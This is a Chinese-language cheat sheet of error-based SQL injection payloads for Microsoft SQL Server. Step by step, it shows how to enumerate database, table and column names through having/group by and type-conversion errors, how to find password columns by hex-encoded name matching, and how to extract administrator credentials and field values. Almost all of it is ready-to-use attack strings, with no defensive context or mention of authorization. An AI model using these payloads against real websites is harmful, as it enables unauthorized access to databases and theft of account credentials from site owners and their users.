MsSQL注入猜解数据库技术

一、having与group by查询报表名与字段名
1.当确定有注入点以后，直接提交having 1=1-- 在错误信息里面即可得到当前表名的第一个字段。
2.然后提交
group by 字段名1 having 1=1--
即可得到第二个字段
3.然后
group by 字段名1,字段名2 having 1=1--

4.group by 字段名1,字段名2,字段名3，字段名n having 1=1--
直到返回正常信息，即可得到所有的字段名

二、order by与数据类型转换报错法
1.爆所有数据库名
and db_name()=0--  爆当前库名

and db_name(n)>0--
通过变换n的值得到所有数据库名

and 0=(select top n cast([name] as nvarchar(256))%2bchar(94)%2bcast([filename] as nvarchar(256)) from(select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--

 通过变换n的值得到所有数据库名

2.爆所有表名

通过下面这个可以得知表的数量
and (select cast(count(1) as varchar(10))%2bchar(94) from [sysobjects] where xtype=char(85) and status!=0)=0--

爆第一个表名
and (select top 1 cast(name as varchar(256)) from (select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

然后继续
and (select top 1 cast(name as varchar(256)) from (select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

以上是爆当前表的，如果爆其他表的话

下面是爆出master数据库的第一个表名
and 0<>(select top 1 name from master.dbo.sysobjects where xtype=0x7500 and name not in(select top 1 name from master.dbo.sysobjects where xtype=0x7500))--
递增数字就可以爆出所有的表名啦

3.爆出包含管理员账户的表名及字段
and (select top 1 cast(id as nvarchar(20))%2bchar(124) from [库名]..[sysobjects] where name='表名')=0--

爆出的是字段的ID，然后再提交如下,爆出字段数目
and (select cast(count(1) as varchar(10))%2bchar(94) from [库名]..[syscolumns] where id=373576369)=0--

然后再提交
and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [库名]..[syscolumns] where id=373576369 order by colid) t order by colid desc)=0--

变化数字得到所有字段名

4.一步爆出包含管理员账户的表与字段
and (select top 1 t_name%2bchar(124)%2bc_name from (select top 20 object_name(id) as t_name,name as c_name from syscolumns where charindEx(cast(0x70617373 as varchar(2000)),name)>0 and left(name,1)!=0x40 order by t_name asc) as T order by t_name desc)>0--

其中0x70617373是pass的十六进制编码

5.爆所有字段值
and (select cast(count(1) as varchar(8000))%2bchar(94) from [库名]..[表名] where 1=1)>0--
以上爆出记录条数

然后
and (select top 1 isnull(cast([字段值1] as nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段值2] as nvarchar(4000)),char(32)) from [表名] where 1=1 order by [字段值1])=0--

三、查询宝库的另一种方法
1.爆所有数据库名
and 1=(select name from master.dbo.sysdatabases where dbid=1)--

增加上面的dbid值，获取其他数据库名

2.爆出当前数据库中的所有表
and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0

改变n数字查询所有表名

3.如果要垮裤查询其他数据库的表名，可提交
and (select top 1 name from(select top n name from 数据库名..sysobjects where xtype=0x75 order by name) t order by name desc)=0
改变n的值查询所有表名

3.爆字段名及字段值
and (select col_name(object_id('hehe'),n))=0
改变n的值，获得所有字段名

and (select top 1 字段名 from 表名)>0  获得第一个字段值后

and (select top 1 字段名 from 表名 where 字段名<>字段值1)>0